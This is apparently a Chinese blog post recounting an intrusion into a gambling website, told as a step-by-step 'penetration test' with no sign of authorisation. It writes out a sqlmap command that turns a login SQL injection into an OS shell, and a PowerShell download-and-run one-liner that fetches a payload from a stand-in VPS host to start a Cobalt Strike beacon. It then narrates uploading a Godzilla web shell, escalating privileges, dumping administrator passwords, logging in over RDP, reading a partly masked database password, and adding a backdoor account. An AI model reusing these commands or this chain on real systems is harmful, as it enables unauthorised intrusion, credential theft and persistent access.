记一次QP渗透测试实战

该站点为棋牌站点，都被大佬们玩烂了：

登录处存在sql注入，可以直接获取shell，抓包获取请求包：

上sqlmap，个人习惯sqlmap语句：python2 .\sqlmap.py -r .\1.txt --batch --random-agent --fresh-queries --dbms mssql --os-shell

执行powershell命令，直接上线cs：powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://vpsip/payload.ps1'))"

查看cs，已经成功上线：

不存在域：

翻一下目录，看能不能传一个哥斯拉，直接提权的那种，不过话说棋牌还谈业绩？？？

这个站上好几个棋牌目录：

日了狗的，找路径找了半天，后面根据时间找到了，上传哥斯拉：

上传成功，哥斯拉连接成功：

提权成功：

利用powershell，直接cs 上线system权限：

抓取管理员密码，芜湖，起飞~~：

看下开放3389端口没~~，开放了呀，尝试登陆：

代理都不用了，直接连上：

查看配置文件，账号：sa，密码Qq166xxxx0373：

查找了一下qq，没找到，好像是一个手机号：

不管了，有个DATA.rar文件150多M，下载不下来，，，连接数据库康康，代理都不用，又直接连上了：

看了几眼，懒得看，，，

后续？哪来的后续，，加个账户走人：